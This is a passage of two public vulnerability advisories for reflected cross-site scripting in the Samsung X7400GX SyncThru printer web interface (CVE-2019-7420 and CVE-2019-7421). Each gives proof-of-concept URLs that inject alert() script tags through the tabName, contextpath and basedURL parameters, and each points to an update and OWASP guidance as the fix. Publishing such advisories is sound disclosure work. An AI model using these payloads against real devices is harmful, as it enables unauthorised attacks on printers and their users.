Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7420 # Category: webapps 1. Proof of Concept URL http://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E Parameter tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7421 # Category: webapps 1. 2. Proof of Concept URL http://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org Parameter contextpath=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&popupid=id_Login Parameter basedURL=<SCRIPT>alert(XSS);</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules -->